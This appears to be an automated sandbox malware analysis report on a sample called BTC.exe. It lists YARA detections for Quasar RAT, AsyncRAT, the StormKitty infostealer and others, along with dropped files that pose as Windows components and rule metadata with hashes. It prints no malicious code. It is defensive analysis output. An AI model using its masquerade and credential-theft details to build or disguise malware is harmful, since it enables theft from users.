Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT | Author: Florian Roth
Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware | Author: Florian Roth
Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Vermin Keylogger | Author: Florian Roth
Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Patchwork malware | Author: Florian Roth
Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifacts associated with disabling Windows Defender | Author: ditekSHen
Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE | Matched rule: QuasarRAT payload | Author: ditekSHen
Source: 00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Quasarrat_e52df647 | Author: unknown
Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
Source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
Source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, type: DROPPED | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Cracked.exe, type: DROPPED | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED | Matched rule: Detects executables referencing many VPN software clients. Observed in infostealers | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, type: DROPPED | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Detects executables referencing many VPN software clients. Observed in infostealers | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Detects StormKitty infostealer | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED | Matched rule: Windows_Trojan_Quasarrat_e52df647 | Author: unknown
Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED | Matched rule: Detects Quasar RAT | Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED | Matched rule: Detects Quasar RAT | Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED | Matched rule: Detects QuasarRAT malware | Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Detects Vermin Keylogger Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Detects Patchwork malware Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPEDMatched rule: QuasarRAT payload Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects Vermin Keylogger Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects Patchwork malware Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPEDMatched rule: QuasarRAT payload Author: ditekSHen
                            Source: C:\Users\user\Desktop\BTC.exe; File created: C:\Users\user\AppData\Roaming\crack.exe
                            Source: C:\Users\user\Desktop\BTC.exe; File created: C:\Users\user\AppData\Roaming\Cracked.exe
                            Source: C:\Users\user\AppData\Roaming\crack.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crack.exe.log
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Cracked.exe.log
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe; Code function: 3_2_00007FF848F03D0E NtProtectVirtualMemory
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe; Code function: 21_2_00007FF848F43DBE NtProtectVirtualMemory
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe; Code function: 26_2_00007FF848F33DBE NtProtectVirtualMemory
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe; Code function: 3_2_00007FF848F03D0E
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe; Code function: 3_2_00007FF848F03D88
                            Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 4_2_05236378
                            Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 4_2_05235AA8
                            Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 4_2_05239730
                            Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 4_2_05235760
                            Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 4_2_05239740
                            Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 4_2_05C105FE
                            Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 4_2_05C10600
                            Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 4_2_05C1C108
                            Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 4_2_05C1C0F7
                            Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 4_2_05C15D53
                            Source: C:\Users\user\AppData\Roaming\svchost.exe; Code function: 4_2_05C15D60
                            Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 5_2_01526378
                            Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 5_2_01525AA8
                            Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 5_2_01529740
                            Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 5_2_01525760
                            Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 5_2_01529730
                            Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 5_2_05DE05FE
                            Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 5_2_05DE0600
                            Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 5_2_05DEC108
                            Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 5_2_05DEC0F7
                            Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 5_2_05DE5D53
                            Source: C:\Users\user\AppData\Roaming\update.exe; Code function: 5_2_05DE5D60
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 6_2_0159A6E0
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 6_2_01599A08
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 6_2_015996C0
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe; Code function: 7_2_00007FF848F172F6
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe; Code function: 7_2_00007FF848F180A2
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe; Code function: 7_2_00007FF848F10F09
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe; Code function: 16_2_049CA6E0
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe; Code function: 16_2_049C9A08
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe; Code function: 16_2_049C96C0
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe; Code function: 16_2_0503BF60
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe; Code function: 16_2_0503ACC8
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe; Code function: 16_2_0503907C
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe; Code function: 16_2_06371598
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 17_2_041CA9B0
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 17_2_041CA99B
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe; Code function: 21_2_00007FF848F43DBE
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 24_2_02B8A6E0
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 24_2_02B89A08
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 24_2_02B8E6F9
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 24_2_02B8E708
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 24_2_02B86438
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 24_2_02B896C0
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe; Code function: 26_2_00007FF848F32B30
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe; Code function: 26_2_00007FF848F33DBE
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe; Code function: 26_2_00007FF848F35E11
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe; Code function: 27_2_00007FF848F10F09
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe; Code function: 58_2_00007FF848F20F09
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe; Code function: 59_2_00007FF848F10F09
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 87_2_028AA6E0
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 87_2_028A9A08
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 87_2_028AE6F9
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 87_2_028AE708
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 87_2_028A96C0
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe; Code function: 92_2_00007FF848F40F09
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 93_2_0258A6E0
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 93_2_02589A08
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 93_2_0258E6F9
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 93_2_0258E708
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe; Code function: 93_2_025896C0
                            Source: BTC.exe, 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameWindows Defender Service Host.exe4 vs BTC.exe
                            Source: BTC.exe, 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameClientAny.exe" vs BTC.exe
                            Source: BTC.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 0.2.BTC.exe.2c80488.2.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
                            Source: 0.2.BTC.exe.2c75848.1.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
                            Source: 0.2.BTC.exe.2c8fa48.3.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice (author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI)
                            Source: 3.0.Cracked.exe.d80000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice (author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI)
                            Source: 3.2.Cracked.exe.310b0a8.1.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice (author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI)
                            Source: 7.0.Windows Defender Service Host.exe.f60000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
                            Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice (author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI)
                            Source: 3.2.Cracked.exe.310b0a8.1.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice (author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI)
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice (author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI)
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
                            Source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice (author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI)
                            Source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
                            Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse (author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys)
                            Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex (author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions)
                            Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN (author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers)
                            Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers)
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Quasarrat_e52df647 (reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23)
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_1 (date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_2 (date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740)
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_QuasarRAT_May19_1 (date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10)
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE; Matched rule: Vermin_Keylogger_Jan18_1 (date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE; Matched rule: xRAT_1 (date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE; Matched rule: CN_disclosed_20180208_KeyLogger_1 (date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_Envrial_Jan18_1 (date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender (author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender)
                            Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_QuasarRAT (author = ditekSHen, description = QuasarRAT payload)
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse (author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys)
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex (author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions)
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN (author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers)
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers)
                            Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_StormKitty (author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty)
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Quasarrat_e52df647 (reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23)
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_1 (date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_2 (date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740)
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_QuasarRAT_May19_1 (date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10)
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE; Matched rule: Vermin_Keylogger_Jan18_1 (date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE; Matched rule: xRAT_1 (date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE; Matched rule: CN_disclosed_20180208_KeyLogger_1 (date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_Envrial_Jan18_1 (date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/)
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender (author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender)
                            Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_QuasarRAT (author = ditekSHen, description = QuasarRAT payload)
